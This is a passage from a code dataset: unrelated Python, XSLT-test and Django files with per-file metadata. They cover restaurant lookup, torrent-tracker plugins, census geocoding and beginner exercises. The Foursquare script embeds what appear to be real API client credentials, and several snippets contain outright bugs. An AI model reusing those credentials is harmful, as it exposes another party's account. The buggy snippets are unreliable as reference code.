set_sizes[1]\n        \n        second_split = set_sizes[1]\n        if sum(set_sizes) <= 1:\n            second_split /= first_split\n\n        train_and_val, test = train_test_split(*arrays,\n                                               test_size = set_sizes[2],\n                                               **options)\n        train, val = train_test_split(train_and_val,\n                                      test_size = second_split,\n                                      **options)\n        return train, val, test","sub_path":"my_lambdata/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"524075581","text":"from geocode import getGeocodeLocation\r\nimport json\r\nimport httplib2\r\n\r\nimport sys\r\nimport codecs\r\n\r\nargs = sys.argv\r\n\r\nfoursquare_client_id = \"2BAWNPEEJM5UELMLYUQJNCTWGWRUKBTY5XHU2SS3POAOMTEP\"\r\nfoursquare_client_secret = \"50VUICQ2MYEAXP1MMKHC0KFWLUBIHNOSD5GTSPTQV4Y0OWIY\"\r\n\r\ndef findARestaurant(mealType,location):\r\n\t#1. Use getGeocodeLocation to get the latitude and longitude coordinates of the location string.\r\n\tlatitude, longitude = getGeocodeLocation(location)\r\n\t\r\n\t#2. Use foursquare API to find a nearby restaurant with the latitude, longitude, and mealType strings.\r\n\t#HINT: format for url will be something like https://api.foursquare.com/v2/venues/search?client_id=CLIENT_ID&client_secret=CLIENT_SECRET&v=20130815&ll=40.7,-74&query=sushi\r\n\turl = ('https://api.foursquare.com/v2/venues/search?client_id=%s&client_secret=%s&v=20130815&ll=%s,%s&query=%s' % (foursquare_client_id, foursquare_client_secret,latitude,longitude,mealType))\r\n\th = httplib2.Http()\r\n\tresult = json.loads(h.request(url,'GET')[1])\r\n\r\n\t#3. Grab the first restaurant\r\n\tfirstInfo = result['response']['venues'][0]\r\n\tvenue_id = firstInfo['id']\r\n\trestaurant_name = firstInfo['name']\r\n\trestaurant_address = firstInfo['location']['formattedAddress']\r\n\taddress = ''\r\n\tfor i in restaurant_address:\r\n\t\t# accumulate the address parts rather than overwriting them\r\n\t\taddress += i + ' '\r\n\trestaurant_address = address\r\n\r\n\t#4. Get a 300x300 picture of the restaurant using the venue_id (you can change this by altering the 300x300 value in the URL or replacing it with 'orginal' to get the original picture\r\n\turl = ('https://api.foursquare.com/v2/venues/%s/photos?client_id=%s&v=20150603&client_secret=%s' % ((venue_id,foursquare_client_id,foursquare_client_secret)))\r\n\tresult = json.loads(h.request(url, 'GET')[1])\r\n\r\n\t#5. 
Grab the first image\r\n\tif result['response']['photos']['items']:\r\n\t\tfirstpic = result['response']['photos']['items'][0]\r\n\t\tprefix = firstpic['prefix']\r\n\t\tsuffix = firstpic['suffix']\r\n\t\timageURL = prefix + \"300x300\" + suffix\r\n\telse:\r\n\t\t#6. if no image available, insert default image url\r\n\t\timageURL = \"http://pixabay.com/get/8926af5eb597ca51ca4c/1433440765/cheeseburger-34314_1280.png?direct\"\r\n\r\n\t#7. Return a dictionary containing the restaurant name, address, and image url\r\n\trestaurantInfo = {'name':restaurant_name, 'address': restaurant_address, 'image':imageURL}\r\n\tprint(\"Restaurant Name: %s\" % restaurantInfo['name'])\r\n\tprint(\"Restaurant Address: %s\" % restaurantInfo['address'])\r\n\tprint(\"Image: %s \\n\" % restaurantInfo['image'])\r\n\tprint(restaurantInfo)\r\n\treturn restaurantInfo\r\n\r\ndef main():\r\n findARestaurant(args[1], args[2])\r\n\t# findARestaurant(\"Pizza\", \"Tokyo, Japan\")\r\n\t# findARestaurant(\"Tacos\", \"Jakarta, Indonesia\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"findARestaurant.py","file_name":"findARestaurant.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"41008632","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 2 10:15:57 2020\n\n@author: cfse2\n\"\"\"\n\n\nimport numpy as np\n\nv = 1/np.sqrt(3)\na = np.array([[v,v,v],[0,0,1],[0,0,1],[0,0,1]])\nb = np.array([[v,v,v],[0,0,1],[0,0,1],[0,0,1]])\n\ndot = np.dot(a,b.T)\ntensordot = np.tensordot(a, b, axes=((0),(0)))\neinsum = np.einsum(\"ij,ij->i\",a,b)\nprint(dot)\nprint(tensordot)\nprint(einsum)","sub_path":"tests/integration/mesh_interfacing/normal_vec_calc.py","file_name":"normal_vec_calc.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"580260848","text":"import abc\nimport html\nimport six\nimport structlog\nfrom enum import Enum\nfrom monitorrent.db import DBSession, row2dict, dict2row\nfrom monitorrent.plugins import Topic\nfrom monitorrent.plugins.status import Status\nfrom monitorrent.plugins.clients import TopicSettings\nfrom monitorrent.utils.bittorrent_ex import Torrent, is_torrent_content\nfrom monitorrent.utils.downloader import download\nfrom monitorrent.engine import Engine\nfrom future.utils import with_metaclass\n\nlog = structlog.get_logger()\n\n\nclass TrackerSettings(object):\n def __init__(self, requests_timeout, proxies):\n self.requests_timeout = requests_timeout\n self.proxies = proxies\n\n def get_requests_kwargs(self):\n return {'timeout': self.requests_timeout, 'proxies': self.proxies}\n\n\nclass TrackerPluginBase(with_metaclass(abc.ABCMeta, object)):\n tracker_settings = None\n topic_class = Topic\n topic_public_fields = ['id', 'url', 'last_update', 'display_name', 'status']\n topic_private_fields = ['display_name']\n topic_form = [{\n 'type': 'row',\n 'content': [{\n 'type': 'text',\n 'model': 'display_name',\n 'label': 'Name',\n 'flex': 100\n }]\n }]\n\n \"\"\"\n :type tracker_settings: TrackerSettings\n \"\"\"\n def init(self, tracker_settings):\n self.tracker_settings = tracker_settings\n # pylint: disable=E1101\n if hasattr(self, 'tracker') and hasattr(self.tracker, 'tracker_settings'):\n # pylint: disable=E1101\n self.tracker.tracker_settings = tracker_settings\n\n @abc.abstractmethod\n def can_parse_url(self, url):\n \"\"\"\n Check if we can parse url\n\n :param url: str\n 
:rtype: bool\n \"\"\"\n\n @abc.abstractmethod\n def parse_url(self, url):\n \"\"\"\n Parse url and extract all information from url to topic\n\n :param url: str\n :rtype: dict\n \"\"\"\n\n def prepare_add_topic(self, url):\n parsed_url = self.parse_url(url)\n if not parsed_url:\n return None\n settings = {\n 'display_name': self._get_display_name(parsed_url),\n }\n return settings\n\n def add_topic(self, url, params):\n \"\"\"\n :type url: str\n :type params: dict\n :rtype: bool\n \"\"\"\n parsed_url = self.parse_url(url)\n if parsed_url is None:\n # TODO: Throw exception, because we shouldn't call add topic if we can't parse URL\n return False\n with DBSession() as db:\n topic = self.topic_class(url=url)\n self._set_topic_params(url, parsed_url, topic, params)\n db.add(topic)\n return True\n\n def get_topics(self, ids):\n with DBSession() as db:\n if ids is not None and len(ids) > 0:\n filter_query = self.topic_class.id.in_(ids)\n else:\n filter_query = self.topic_class.status.in_((Status.Ok, Status.Error))\n filter_query &= self.topic_class.paused == False\n topics = db.query(self.topic_class)\\\n .filter(filter_query)\\\n .all()\n db.expunge_all()\n return topics\n\n def save_topic(self, topic, last_update, status=Status.Ok):\n if not isinstance(topic, self.topic_class):\n raise Exception(u\"Can't update topic of wrong class. Expected {0}, but was {1}\"\n .format(self.topic_class, topic.__class__))\n\n with DBSession() as db:\n new_topic = topic\n if last_update is not None:\n new_topic.last_update = last_update\n new_topic.status = status\n db.add(new_topic)\n db.flush()\n db.expunge(new_topic)\n\n def save_status(self, topic_id, status):\n with DBSession() as db:\n topic = db.query(self.topic_class).filter(Topic.id == topic_id).first()\n topic.status = status\n\n def get_topic(self, id):\n with DBSession() as db:\n topic = db.query(self.topic_class).filter(Topic.id == id).first()\n if topic is None:\n return None\n data = row2dict(topic, None, self.topic_public_fields)\n data['info'] = self.get_topic_info(topic)\n data['download_dir'] = topic.download_dir\n return data\n\n def update_topic(self, id, params):\n with DBSession() as db:\n topic = db.query(self.topic_class).filter(Topic.id == id).first()\n if topic is None:\n return False\n self._set_topic_params(None, None, topic, params)\n return True\n\n def get_topic_info(self, topic):\n \"\"\"\n\n :type topic: object\n :rtype : str\n \"\"\"\n return None\n\n @abc.abstractmethod\n def execute(self, topics, engine):\n \"\"\"\n :param topics: result of get_topics func\n :type engine: Engine\n :return: None\n \"\"\"\n\n @abc.abstractmethod\n def _prepare_request(self, topic):\n \"\"\"\n \"\"\"\n\n def _get_display_name(self, parsed_url):\n \"\"\"\n :type parsed_url: dict\n \"\"\"\n return parsed_url['original_name']\n\n def _set_topic_params(self, url, parsed_url, topic, params):\n \"\"\"\n\n :type url: str | None\n :type parsed_url: object | dict | None\n :type topic: Topic\n :type params: dict\n \"\"\"\n fields = None\n if self.topic_private_fields is not None:\n fields = self.topic_private_fields + ['download_dir']\n dict2row(topic, params, fields)\n\n\nclass TrackerPluginMixinBase(object):\n def __init__(self):\n if not isinstance(self, TrackerPluginBase):\n raise Exception('TrackerPluginMixinBase can be applied only to TrackerPluginBase classes')\n super(TrackerPluginMixinBase, self).__init__()\n\n\n# noinspection PyUnresolvedReferences\nclass ExecuteWithHashChangeMixin(TrackerPluginMixinBase):\n def __init__(self):\n 
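# This mixin only works when the host plugin's topic_class can persist a torrent info-hash; verify that up front.\n        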
super(ExecuteWithHashChangeMixin, self).__init__()\n if not hasattr(self.topic_class, 'hash'):\n raise Exception(\"ExecuteWithHashMixin can be applied only to TrackerPluginBase class \"\n \"with hash attribute in topic_class\")\n\n def execute(self, topics, engine):\n \"\"\"\n :param topics: result of get_topics func\n :type engine: engine.EngineTracker\n :return: None\n \"\"\"\n with engine.start(len(topics)) as engine_topics:\n for i in range(0, len(topics)):\n topic = topics[i]\n topic_name = topic.display_name\n with engine_topics.start(i, topic_name) as engine_topic:\n changed = False\n if hasattr(self, 'check_changes'):\n changed = self.check_changes(topic)\n if not changed:\n continue\n\n prepared_request = self._prepare_request(topic)\n download_kwargs = dict(self.tracker_settings.get_requests_kwargs())\n if isinstance(prepared_request, tuple) and len(prepared_request) >= 2:\n if prepared_request[1] is not None:\n download_kwargs.update(prepared_request[1])\n prepared_request = prepared_request[0]\n response, filename = download(prepared_request, **download_kwargs)\n if hasattr(self, 'check_download'):\n status = self.check_download(response)\n if topic.status != status:\n self.save_status(topic.id, status)\n engine_topic.status_changed(topic.status, status)\n if status != Status.Ok:\n continue\n elif response.status_code != 200:\n raise Exception(u\"Can't download url. Status: {}\".format(response.status_code))\n if not filename:\n filename = topic_name\n torrent_content = response.content\n if not is_torrent_content(torrent_content):\n headers = ['{0}: {1}'.format(k, v) for k, v in six.iteritems(response.headers)]\n engine.failed(u'Downloaded content is not a torrent file.
\\r\\n'\n u'Headers:
\\r\\n{0}'.format(u'
\\r\\n'.join(headers)))\n continue\n torrent = Torrent(torrent_content)\n old_hash = topic.hash\n if torrent.info_hash != old_hash:\n with engine_topic.start(1) as engine_downloads:\n try:\n last_update = engine_downloads.add_torrent(0, filename, torrent, old_hash,\n TopicSettings.from_topic(topic))\n engine.downloaded(u\"Torrent {0} was changed\".format(topic_name), torrent_content)\n topic.hash = torrent.info_hash\n topic.last_update = last_update\n self.save_topic(topic, last_update, Status.Ok)\n except Exception as e:\n log.error(\"Error while add downloading torrent to client\", topic_name=topic_name,\n exception=str(e))\n engine.failed(u\"Torrent {0} was changed, but can't be added, error: {1}\"\n .format(topic_name, str(e)))\n elif changed:\n engine.info(u\"Torrent {0} was determined as changed, but torrent hash wasn't\"\n .format(topic_name))\n self.save_topic(topic, None, Status.Ok)\n\n\nclass LoginResult(Enum):\n Ok = 1\n CredentialsNotSpecified = 2\n IncorrentLoginPassword = 3\n InternalServerError = 500\n ServiceUnavailable = 503\n Unknown = 999\n\n def __str__(self):\n if self == LoginResult.Ok:\n return u\"Ok\"\n if self == LoginResult.CredentialsNotSpecified:\n return u\"Credentials not specified\"\n if self == LoginResult.IncorrentLoginPassword:\n return u\"Incorrent login/password\"\n if self == LoginResult.InternalServerError:\n return u\"Internal server error\"\n if self == LoginResult.ServiceUnavailable:\n return u\"Service unavailable\"\n return u\"Unknown\"\n\n\n# noinspection PyUnresolvedReferences\nclass WithCredentialsMixin(with_metaclass(abc.ABCMeta, TrackerPluginMixinBase)):\n credentials_class = None\n credentials_public_fields = ['username']\n credentials_private_fields = ['username', 'password']\n\n credentials_form = [{\n 'type': 'row',\n 'content': [{\n 'type': 'text',\n 'model': 'username',\n 'label': 'Username',\n 'flex': 50\n }, {\n \"type\": \"password\",\n \"model\": \"password\",\n \"label\": \"Password\",\n \"flex\": 50\n }]\n }]\n\n @abc.abstractmethod\n def login(self):\n \"\"\"\n :rtype: LoginResult\n \"\"\"\n\n @abc.abstractmethod\n def verify(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n\n def get_credentials(self):\n with DBSession() as db:\n dbcredentials = db.query(self.credentials_class).first()\n if dbcredentials is None:\n return None\n return row2dict(dbcredentials, None, self.credentials_public_fields)\n\n def update_credentials(self, credentials):\n with DBSession() as db:\n dbcredentials = db.query(self.credentials_class).first()\n if dbcredentials is None:\n dbcredentials = self.credentials_class()\n db.add(dbcredentials)\n dict2row(dbcredentials, credentials, self.credentials_private_fields)\n return self.login()\n\n def execute(self, ids, engine):\n if not self._execute_login(engine):\n return\n super(WithCredentialsMixin, self).execute(ids, engine)\n\n def _execute_login(self, engine):\n if not self.verify():\n engine.info(u\"Credentials/Settings are not valid\\nTry login.\")\n login_result = self.login()\n if login_result == LoginResult.CredentialsNotSpecified:\n engine.info(u\"Credentials not specified\\nSkip plugin\")\n return False\n if login_result != LoginResult.Ok:\n engine.failed(u\"Can't login: {}\".format(login_result))\n return False\n engine.info(u\"Login successful\")\n return True\n engine.info(u\"Credentials/Settings are valid\")\n return 
True\n","sub_path":"monitorrent/plugins/trackers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"215776179","text":"import wx\nimport os\nimport gettext\nimport iH2O_DataProcessor_GUI as gui\nimport drift_precision\n\nclass MyApp(wx.App):\n def OnInit(self):\n wx.InitAllImageHandlers()\n self.mainFrame = gui.clsMainFrame(None, wx.ID_ANY, \"\")\n self.mainFrame.Show()\n\n\n # Setup GUI\n computer_name = os.environ['COMPUTERNAME']\n self.mainFrame.statusbar.SetStatusText(computer_name, 2)\n\n\n # Menu Events\n wx.EVT_MENU(self, gui.ID_EXIT, self.OnMenuExit)\n\n \n return True\n\n\n def OnMenuExit(self, event):\n self.mainFrame.Close()\n\n\nif __name__ == \"__main__\":\n gettext.install(\"app\")\n app = MyApp(False)\n app.MainLoop()\n","sub_path":"MainGUI.py","file_name":"MainGUI.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"117427320","text":"import csv\r\nimport _sqlite3\r\n\r\nconn = _sqlite3.connect(\"employee.db\")\r\nmycursor = conn.cursor()\r\nprint(\"opened database successfully\")\r\nprint(_sqlite3.sqlite_version)\r\ntab = \"\"\"CREATE TABLE employee(id INT NOT NULL PRIMARY KEY, name VARCHAR, salary INT NOT NULL PRIMARY KEY)\"\"\"\r\nmycursor.execute(tab)\r\n\r\n\r\nfor row in csv.reader(open('employee.csv', 'r'), delimiter=','):\r\n if row:\r\n val1 = row[0]\r\n val2 = row[1]\r\n val3 = row[2]\r\n # print(val)\r\n mycursor.execute(\"INSERT INTO employee VALUES(?,?,?)\", (val1, val2, val3))\r\n # mycursor.execute(sql, val)\r\n mycursor.execute(\"SELECT * FROM employee\")\r\n result = mycursor.fetchall()\r\n print(result)","sub_path":"task 20.py","file_name":"task 20.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"272058937","text":"## 2. Enumerate ##\n\nships = [\"Andrea Doria\", \"Titanic\", \"Lusitania\"]\ncars = [\"Ford Edsel\", \"Ford Pinto\", \"Yugo\"]\n\nfor i,ship in enumerate(ships):\n print(ship)\n print(cars[i])\n\n## 3. Adding Columns ##\n\nthings = [[\"apple\", \"monkey\"], [\"orange\", \"dog\"], [\"banana\", \"cat\"]]\ntrees = [\"cedar\", \"maple\", \"fig\"]\n\nfor i, thing in enumerate(things):\n thing.append(trees[i])\n \nprint(things)\n\n## 4. List Comprehensions ##\n\napple_prices = [100, 101, 102, 105]\n\napple_prices_doubled=[price*2 for price in apple_prices]\napple_prices_lowered=[price-100 for price in apple_prices]\n\n## 5. Counting Female Names ##\n\nname_counts={}\n\nfor item in legislators:\n if item[3]==\"F\" and int(item[2].split(\"-\")[0])>1940:\n name=item[1]\n if name in name_counts:\n name_counts[name]=name_counts[name]+1\n else:\n name_counts[name]=1\n \n \n\n\n## 7. Comparing with None ##\n\nvalues = [None, 10, 20, 30, None, 50]\nchecks = []\n\nfor item in values:\n a = item is not None and item>30\n checks.append(a)\n\n## 8. Highest Female Name Count ##\n\nmax_value=None\n\nfor key in name_counts:\n count=name_counts[key]\n if max_value is None or count>=max_value:\n max_value=count\n \n \n\n## 9. The Items Method ##\n\nplant_types = {\"orchid\": \"flower\", \"cedar\": \"tree\", \"maple\": \"tree\"}\n\nfor name,oftype in plant_types.items():\n print(name,oftype)\n\n## 10. 
Finding the Most Common Female Names ##\n\ntop_female_names = []\n\nfor item in name_counts:\n if name_counts[item]==2:\n top_female_names.append(item)\n \n \n\n## 11. Finding the Most Common Male Names ##\n\ntop_male_names = []\nmale_name_counts={}\n\n\nfor item in legislators:\n if item[3]==\"M\" and item[7]>1940:\n name=item[1]\n if name in male_name_counts:\n male_name_counts[name]=male_name_counts[name]+1\n else:\n male_name_counts[name]=1\n \nhighest_male_count=None\n\nfor name,count in male_name_counts.items():\n if highest_male_count is None or count>=highest_male_count:\n highest_male_count=count\n\nprint(max_value)\n\nfor name,count in male_name_counts.items():\n if count ==highest_male_count:\n top_male_names.append(name)\n \n \n \n ","sub_path":"2-python-programming-intermediate/List Comprehensions-16.py","file_name":"List Comprehensions-16.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"374084790","text":"\nimport collections\nimport ftplib\nimport itertools\nimport os\nimport sqlite3\nimport sys\nimport time\nimport traceback\nimport zipfile\n\n\ndef setup_geocode_table(verbose):\n '''This sets up the geocoding database.\n\n Args:\n verbose: True/False for whether function outputs info.\n Returns:\n None\n Raises:\n None\n\n This function first downloads a geographic header file for each state. It\n then downloads file 00002 for each state. These are downloaded in zip\n format, and then unzipped. It then creates two tables, geocode_data and\n logical_race_data and populates the database. The geocode_data contains\n data for geographic areas. The logical record from the geocode_data\n directly correlates with a specific population in the geographic area,\n which is broken down by race.\n\n '''\n \n # For 'Other race\" Iterative Proportional Fitting is used. Costants here.\n OTHER_RACE_HISPANIC_RATE = float(11.1)/100\n OTHER_RACE_WHITE_RATE = float(70.5)/100\n OTHER_RACE_BLACK_RATE = float(11.3)/100\n OTHER_RACE_API_RATE = float(7.0)/100\n OTHER_RACE_AI_RATE = float(.9)/100\n OTHER_RACE_MULTIRACIAL_RATE = float(.8)/100\n \n if verbose is True:\n sys.stdout.write('Downloading census files ... 
\\t\\t\\n')\n # Created named tuple for organizing\n home_dir_path = os.path.expanduser(\"~\")\n data_dir_path = os.path.join(home_dir_path, '.surgeo')\n # Download files from census server.\n ftp = ftplib.FTP('ftp.census.gov')\n ftp.login()\n ftp.cwd('census_2000/datasets/Summary_File_1')\n # List dir\n state_list = ftp.nlst()\n time.sleep(0)\n # Drop all elements prior to states\n state_list = itertools.dropwhile(lambda x: x != 'Alabama', state_list)\n # Make dropwhile object to list\n state_list = list(state_list)\n zip_files_downloaded = []\n for state in state_list:\n time.sleep(0)\n ftp.cwd('/')\n ftp.cwd(''.join(['census_2000/datasets/Summary_File_1',\n '/',\n state]))\n file_list = ftp.nlst()\n for item in file_list:\n time.sleep(0)\n if '00002_uf1.zip' in item or 'geo_uf1.zip' in item:\n if verbose is True:\n print(''.join(['Downloading ', item]))\n file_path = os.path.join(data_dir_path, item)\n zip_files_downloaded.append(file_path)\n ftp.retrbinary('RETR ' + item, open(file_path, 'wb+').write)\n if verbose is True:\n sys.stdout.write('\\t\\t\\t\\t\\tOK\\n')\n # unzip files\n for zipfile_path in zip_files_downloaded:\n time.sleep(0)\n # Name of XXgeo_uf1.zip --> XXgeo.uf1\n # Name of XX00002_uf1.zip --> XX0000.uf1\n file_component = os.path.basename(zipfile_path).replace('.zip', '')\n file_component = file_component.replace('_', '.')\n if verbose is True:\n print('Writing {}'.format(file_component))\n dir_component = os.path.dirname(zipfile_path)\n # Zip file is now and iterator to save on ram.\n with zipfile.ZipFile(zipfile_path, 'r') as f:\n with f.open(file_component, 'r') as f2:\n with open(os.path.join(dir_component,\n file_component),\n 'w+b') as f3:\n for line in f2:\n f3.write(line)\n # Now everything has been downloaded. Start commit to db\n try:\n db_path = os.path.join(os.path.expanduser('~'),\n '.surgeo',\n 'census.db')\n connection = sqlite3.connect(db_path)\n cursor = connection.cursor()\n cursor.execute('''CREATE TABLE IF NOT EXISTS\n geocode_data(id INTEGER PRIMARY KEY,\n state TEXT, summary_level TEXT, logical_record TEXT,\n zcta TEXT)''')\n cursor.execute('''CREATE TABLE IF NOT EXISTS logical_race_data(id\n INTEGER PRIMARY KEY, state TEXT, logical_record TEXT,\n num_white REAL, num_black REAL, num_ai REAL,\n num_api REAL, num_hispanic REAL, num_multi REAL)''')\n # now start loading to db\n list_of_filenames = os.listdir(data_dir_path)\n number_of_filenames = len(list_of_filenames)\n for index, filename in enumerate(list_of_filenames):\n time.sleep(0)\n # First the geographic header file\n if 'geo.uf1' in filename:\n if verbose is True:\n try:\n last_write\n except NameError:\n last_write = 1\n if index > last_write:\n sys.stdout.write('\\rWriting geoheader: {} of {}'\n .format(index,\n number_of_filenames))\n last_write = index\n file_path = os.path.join(data_dir_path,\n filename)\n #\n DESIRED_SUMMARY_LEVEL = '871'\n # Only latin1 appears to work, even thoug site specifies ascii\n with open(file_path, 'r', encoding='latin-1') as f3:\n for line in f3:\n time.sleep(0)\n state = line[6:8]\n summary_level = line[8:11]\n logical_record = line[18:25]\n zcta = line[160:165]\n # Only ZCTA wide numbers considered\n if not summary_level == DESIRED_SUMMARY_LEVEL:\n continue\n cursor.execute('''INSERT INTO geocode_data(id,\n state, summary_level, logical_record,\n zcta) VALUES(NULL, ?, ?, ?, ?)''',\n (state,\n summary_level,\n logical_record,\n zcta))\n if verbose is True:\n sys.stdout.write('\\rWriting geoheader: {} of {}\\n'.format\n (number_of_filenames, 
number_of_filenames))\n for index, filename in enumerate(list_of_filenames):\n time.sleep(0)\n # First the geographic header file\n if '00002.uf1' in filename:\n if verbose is True:\n try:\n last_write\n last_write = 1\n except NameError:\n last_write = 1\n if index > last_write:\n sys.stdout.write('\\rWriting race data: {} of {}'\n .format(index,\n number_of_filenames))\n sys.stdout.flush()\n last_write = index\n file_path = os.path.join(data_dir_path,\n filename)\n with open(file_path, 'r', encoding='latin-1') as f4:\n for line in f4:\n # Remainder db input\n table_p8 = line.split(',')[86:103]\n state = line[5:7]\n logical_record = line[15:22]\n # Need to translate \"Other race\" into one of the\n # six categories through proportional fitting.\n num_other = table_p8[7]\n OTHER_RACE_HISPANIC_RATE\n OTHER_RACE_WHITE_RATE\n OTHER_RACE_BLACK_RATE\n OTHER_RACE_API_RATE\n OTHER_RACE_AI_RATE\n OTHER_RACE_MULTIRACIAL_RATE\n other_hispanic = str(round(int(num_other) * \n OTHER_RACE_HISPANIC_RATE))\n other_white = str(round(int(num_other) * \n OTHER_RACE_WHITE_RATE))\n other_black = str(round(int(num_other) * \n OTHER_RACE_BLACK_RATE))\n other_api = str(round(int(num_other) * \n OTHER_RACE_API_RATE))\n other_ai = str(round(int(num_other) * \n OTHER_RACE_AI_RATE))\n other_multiracial = str(round(int(num_other) * \n OTHER_RACE_MULTIRACIAL_RATE))\n # Breaking up table p8\n total_pop = table_p8[0]\n total_not_hispanic = table_p8[1]\n num_white = str(int(table_p8[2]) + int(other_white))\n num_black = str(int(table_p8[3]) + int(other_black))\n num_ai = str(int(table_p8[4]) + int(other_ai))\n num_asian = table_p8[5]\n num_pacisland = table_p8[6]\n num_api = str(int(num_asian) + \n int(num_pacisland) +\n int(other_api))\n num_other = table_p8[7]\n num_multi = str(int(table_p8[8]) + \n int(other_multiracial))\n num_hispanic = str(int(table_p8[9]) +\n int(other_hispanic)) \n cursor.execute('''INSERT INTO logical_race_data(\n id, state, logical_record,\n num_white, num_black,\n num_ai, num_api,\n num_hispanic, num_multi) VALUES(\n NULL, ?, ?, ?, ?, ?, ?, ?, ?)''',\n (state,\n logical_record,\n num_white,\n num_black,\n num_ai,\n num_api,\n num_multi,\n num_hispanic))\n if verbose is True:\n sys.stdout.write('\\rWriting blockfile: {} of {}\\n'\n .format(number_of_filenames, number_of_filenames))\n sys.stdout.write('Creating indices ... 
\\t\\t\\t')\n sys.stdout.flush()\n cursor.execute('''CREATE INDEX IF NOT EXISTS zcta_index ON\n geocode_data(zcta)''')\n cursor.execute('''CREATE INDEX IF NOT EXISTS logical_record_index ON\n logical_race_data(logical_record)''')\n sys.stdout.write('OK\\n')\n # Now commit\n connection.commit()\n connection.close()\n except sqlite3.Error as e:\n traceback.print_exc()\n connection.rollback()\n connection.close()\n raise e\n","sub_path":"surgeo/db/db_setup_geocode.py","file_name":"db_setup_geocode.py","file_ext":"py","file_size_in_byte":11289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"283794361","text":"# www.NeatChange.com\n# Make a difference in your life !\n#\n# Poplar Oct 7 2016\n# Scale 进阶\n\nfrom tkinter import *\n\n\nroot = Tk()\nroot.title(\"Scale\")\n\ns1 = Scale(root, from_=0, to=42, tickinterval=10, resolution=5) # 设置刻度为10精度为5\ns1.pack()\ns2 = Scale(root, from_=0, to=200, orient=HORIZONTAL, length=600) # 设置显示长度为600像素\ns2.pack()\n\nroot.mainloop()\n\n","sub_path":"Study/Python/Python库/标准库/Tkinter库/组件/Scale-游标/Scale进阶.py","file_name":"Scale进阶.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"372927945","text":"def main():\n\n userNum = -1 #Initialize variable for user input\n\n while userNum < 0: #Verification loop for user input\n userNum = int(input(\"Enter a positive number: \"))\n if userNum < 0:\n print(\"Invalid number\")\n\n \n print(fibIter(userNum)) #fibIter functuion call\n\ndef fibIter(userNum):\n if userNum == 0: #first fib number is 0\n return 0 \n elif userNum == 1: #Second fib number is 1\n return 1\n elif userNum == 2: #Third fib number is 1\n return 1\n elif userNum == 3: #4th fib number is 2\n return 2\n elif userNum > 3: # Iterative loop for fib sequence\n fn = 0\n fn1 = 1\n fn2 = 2\n for i in range(3, userNum): #Loop for numbers between 3 and user input\n fn = fn1 + fn2 #Fib sequence definition\n fn1 = fn2 #Swap\n fn2 = fn\n return fn\n else:\n return -1\n\nmain()\n","sub_path":"algorithms/AlgorithmsProject-master/project1/ESSJ1B.py","file_name":"ESSJ1B.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"307770637","text":"#Alex Reutter finds brokenness in text output method\nfrom Xml.Xslt import test_harness\n\nsheet_1 = \"\"\"\n\n\n\n\n]]>\n\n\n\"\"\"\n\nsource_1 = \"\"\"\"\"\"\n\nexpected_1 = ''\n\n\ndef Test(tester):\n source = test_harness.FileInfo(string=source_1)\n sheet = test_harness.FileInfo(string=sheet_1)\n test_harness.XsltTest(tester, source, [sheet], expected_1,\n title='text output method bug')\n return\n","sub_path":"dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/ar_20001110.py","file_name":"ar_20001110.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"593338379","text":"def nStream(l: [], N: int) -> []:\n # invalid input\n if N < 0 or not isinstance(N, int):\n raise Exception(\"N has to be a positive integer\")\n\n #handle empty master list\n result = []\n if len(l) == 0:\n for _ in range(N):\n result.append([])\n return result\n\n minItems = int(len(l)/N)\n currentIndex = 0\n group = 0\n\n while group < N and currentIndex < len(l):\n result.append(l[currentIndex:currentIndex+minItems])\n currentIndex += minItems\n group += 1\n\n # having lefftover\n while currentIndex < len(l):\n pos 
= currentIndex % N\n        result[pos].append(l[currentIndex])\n        currentIndex += 1\n\n    return result\n\nprint(nStream([],3))","sub_path":"week6/nStream/nStream.py","file_name":"nStream.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"378717256","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError\nfrom nose.tools import raises, assert_equals, assert_not_equals, assert_true, nottest\nfrom api.models import Procedure, Page\nfrom utils import factories\n\n\nclass ProcedureTest(TestCase):\n    def setUp(self):\n        self.test_user = User.objects.create_user(\n            'TestUser',\n            'test@sanaprotocolbuilder.me',\n            'testpassword'\n        )\n        self.test_user.save()\n\n        self.test_procedure1 = Procedure.objects.create(\n            author='tester',\n            title='test procedure 1',\n            owner=self.test_user\n        )\n        self.test_procedure1.save()\n\n        self.test_procedure2 = Procedure.objects.create(\n            author='tester',\n            title='test procedure 2',\n            owner=self.test_user\n        )\n        self.test_procedure2.save()\n\n    def test_create_page(self):\n        page = Page.objects.create(\n            display_index=0,\n            procedure=self.test_procedure1\n        )\n\n        assert_equals(page.display_index, 